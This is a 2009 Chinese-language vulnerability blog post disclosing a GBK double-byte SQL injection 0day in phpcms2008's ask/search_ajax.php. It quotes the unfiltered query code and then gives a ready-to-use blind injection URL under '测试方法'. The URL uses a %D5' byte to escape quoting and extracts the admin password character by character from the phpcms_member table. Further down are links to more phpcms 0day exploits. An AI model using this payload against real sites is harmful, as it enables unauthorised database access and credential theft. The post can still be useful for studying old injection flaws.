phpcms2008 GBK 双字节编码 0day ask/search_ajax.php

2009, November 6, 3:06 PM. 漏洞集研
Submitted by admin

作者:幻泉[B.S.N]

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

漏洞等级:高
漏洞说明:
/ask/search_ajax.php
Code:

  1. if($q)  
  2. {  
  3. $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where  
  4. }  
  5. else 
  6. {  
  7. exit('null');  
  8. }  
  9. $infos = $ask->listinfo($where'askid DESC''', 10); 

 

/ask/include/answer.class.php

Code:

  1. function listinfo($where = ''$order = ''$page = 1, $pagesize = 50)  
  2. {  
  3. if($where$where = " WHERE $where";  
  4. if($order$order = " ORDER BY $order";  
  5. $page = max(intval($page), 1);  
  6. $offset = $pagesize*($page-1);  
  7. $limit = " LIMIT $offset, $pagesize";  
  8. $r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");  
  9. $number = $r['number'];  
  10. $this->pages = pages($number$page$pagesize);  
  11. $array = array();  
  12. $i = 1;  
  13. $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");  
  14. while($r = $this->db->fetch_array($result))  
  15. {  
  16. $r['orderid'] = $i;  
  17. $array[] = $r;  
  18. $i++;  
  19. }  
  20. $this->number = $this->db->num_rows($result);  
  21. $this->db->free_result($result);  
  22. return $array;  

 

测试方法:

  1. /ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23 
Tags: phpcms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
phpcms V9 BLind SQL Injection Vulnerability (浏览: 15092, 评论: 0)
Phpcms 2008 flash_upload.php文件注入漏洞 (浏览: 16024, 评论: 0)
Phpcms 2008 query.php SQL注入漏洞 (浏览: 9255, 评论: 0)
Phpcms 2008 space.api.php SQL注入漏洞 (浏览: 7968, 评论: 0)
很老的一个PHPCMS2008 SP2 0day (浏览: 10069, 评论: 0)
Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行 (浏览: 10945, 评论: 0)
phpcms 0day一枚 (浏览: 13997, 评论: 0)
phpcms2008 sp3通杀0day (浏览: 8566, 评论: 0)
phpcms2008sp4 最新sql注入 (浏览: 9818, 评论: 0)
phpcms2008sp4 IIS下下载任意文件漏洞 (浏览: 11142, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):